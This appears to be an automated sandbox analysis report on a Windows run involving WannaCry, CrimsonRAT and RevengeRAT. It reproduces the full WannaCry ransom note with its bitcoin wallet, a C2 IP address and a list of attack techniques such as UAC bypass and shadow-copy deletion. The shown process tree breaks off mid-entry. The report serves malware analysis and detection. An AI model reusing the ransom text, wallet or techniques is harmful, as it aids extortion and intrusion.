Analysis

  • max time kernel
    700s
  • max time network
    736s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2024 15:41

General

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Extracted

Family

crimsonrat

C2

185.136.161.124

Signatures

  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • UAC bypass 3 TTPs 3 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • RevengeRat Executable 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 35 IoCs
  • Loads dropped DLL 9 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs

    UAC Bypass Attempt via SilentCleanup Task.

  • Adds Run key to start application 2 TTPs 17 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 26 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 52 IoCs
  • Suspicious use of SetWindowsHookEx 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bloxflip.com/a/kriszti
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3060
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9d046f8,0x7ffba9d04708,0x7ffba9d04718
      2⤵
        PID:1184
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
        2⤵
          PID:3024
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3196
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
          2⤵
            PID:1164
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
            2⤵
              PID:4488
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
              2⤵
                PID:436
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                2⤵
                  PID:3492
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
                  2⤵
                    PID:5108
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
                    2⤵
                      PID:2808
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                      2⤵
                        PID:5116
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
                        2⤵
                          PID:2216
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3224
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                          2⤵
                            PID:3924
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
                            2⤵
                              PID:1140
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                              2⤵
                                PID:3200
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                                2⤵
                                  PID:3328
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
                                  2⤵
                                    PID:4304
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
                                    2⤵
                                      PID:772
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
                                      2⤵
                                        PID:1020
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
                                        2⤵
                                          PID:1444
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
                                          2⤵
                                            PID:4180
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
                                            2⤵
                                              PID:5388
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6548 /prefetch:8
                                              2⤵
                                                PID:5624
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:1
                                                2⤵
                                                  PID:6068
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
                                                  2⤵
                                                    PID:5332
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2752 /prefetch:8
                                                    2⤵
                                                      PID:5924
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
                                                      2⤵
                                                        PID:5896
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5388 /prefetch:8
                                                        2⤵
                                                          PID:4092
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 /prefetch:8
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5476
                                                        • C:\Users\Admin\Downloads\AnyDesk.exe
                                                          "C:\Users\Admin\Downloads\AnyDesk.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1476
                                                        • C:\Users\Admin\Downloads\AnyDesk.exe
                                                          "C:\Users\Admin\Downloads\AnyDesk.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1832
                                                          • C:\Users\Admin\Downloads\AnyDesk.exe
                                                            "C:\Users\Admin\Downloads\AnyDesk.exe" --local-service
                                                            3⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4548
                                                            • C:\Users\Admin\Downloads\AnyDesk.exe
                                                              "C:\Users\Admin\Downloads\AnyDesk.exe" --backend
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Drops file in System32 directory
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:220
                                                          • C:\Users\Admin\Downloads\AnyDesk.exe
                                                            "C:\Users\Admin\Downloads\AnyDesk.exe" --local-control
                                                            3⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: AddClipboardFormatListener
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:1592
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4940 /prefetch:2
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5328
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
                                                          2⤵
                                                            PID:6132
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                                                            2⤵
                                                              PID:3912
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                                                              2⤵
                                                                PID:4152
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:1
                                                                2⤵
                                                                  PID:6060
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:1
                                                                  2⤵
                                                                    PID:5300
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                                                                    2⤵
                                                                      PID:3828
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
                                                                      2⤵
                                                                        PID:1188
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
                                                                        2⤵
                                                                          PID:4404
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
                                                                          2⤵
                                                                            PID:4760
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
                                                                            2⤵
                                                                              PID:2612
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2676
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
                                                                              2⤵
                                                                                PID:4048
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
                                                                                2⤵
                                                                                  PID:1768
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2144 /prefetch:1
                                                                                  2⤵
                                                                                    PID:3496
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
                                                                                    2⤵
                                                                                      PID:3172
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1
                                                                                      2⤵
                                                                                        PID:1968
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7268 /prefetch:8
                                                                                        2⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5272
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
